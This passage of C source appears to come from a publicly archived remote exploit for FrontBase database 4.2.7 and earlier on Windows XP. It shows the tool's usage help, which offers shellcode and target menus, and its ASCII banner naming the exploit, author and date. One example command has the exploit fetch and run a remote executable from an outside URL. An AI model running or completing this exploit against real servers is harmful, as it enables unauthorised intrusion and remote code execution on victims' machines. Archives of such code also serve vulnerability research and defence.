    printf(" Usage: %s -h <host> -p <port> -s <shellcode> -t <target> -u <user> -p <password> -d <database> -D <dbpassword> -x <url>\n", s);
    fputs(" ----------------------------------------------------------------------- \n", stdout);
    fputs(" Arguments:\n", stdout);
    fputs("\n", stdout);
    for (line = 0; line < sizeof option_help / sizeof option_help[0]; line++)
        fputs(option_help[line], stdout);
    fputs("\n", stdout);

    /* Numbered list of payload entries, up to the NULL sentinel. */
    fputs(" Shellcodes:\n\n", stdout);
    row = 0;
    while (shellcodes[row].name != 0)
    {
        printf(" %d. %s \n", row + 1, shellcodes[row].name);
        row++;
    }
    fputs("\n", stdout);

    /* Numbered list of target entries, up to the NULL sentinel. */
    fputs(" Targets:\n\n", stdout);
    row = 0;
    while (targets[row].t != 0)
    {
        printf(" %d. %s\n", row + 1, targets[row].t);
        row++;
    }
    fputs("\n", stdout);

    fputs(" Examples:\n\n", stdout);
    printf(" %s -h 127.0.0.1 -d New\n", s);
    printf(" %s -h 127.0.0.1 -p 1155 -u root -p dta -D dta -t 1\n", s);
    printf(" %s -h 127.0.0.1 -d New -t 5 -s 2 -x http://dreatica.com/calc.exe\n", s);
    fputs(" ----------------------------------------------------------------------- \n", stdout);
}
/*
 * Prints the fixed start-up banner (ASCII-art crew name plus the tool's title, tested
 * versions, author, version, platform and date) to stdout. Takes no input and returns
 * nothing.
 */
void logo()
{
    static const char *const banner[] = {
        " ####################################################################### \n",
        " # ____ __ _ ______ __ _____ #\n",
        " # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n",
        " # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n",
        " # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n",
        " # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n",
        " # crew #\n",
        " ####################################################################### \n",
        " # Exploit : Frontbase <= 4.2.7 for Windows (multiple targets) # \n",
        " # Tested : Frontbase 4.1.16 and 4.2.7 # \n",
        " # Author : Heretic2 ([email protected]) # \n",
        " # Version : 2.2 # \n",
        " # System : Windows XP SP0-SP2 # \n",
        " # Date : 02.04.2007 # \n",
        " # ------------------------------------------------------------------- # \n",
    };
    size_t row;

    /* None of the lines contains a '%', so fputs() emits exactly what printf() would. */
    for (row = 0; row < sizeof banner / sizeof banner[0]; row++)
        fputs(banner[row], stdout);
}
// sebug.net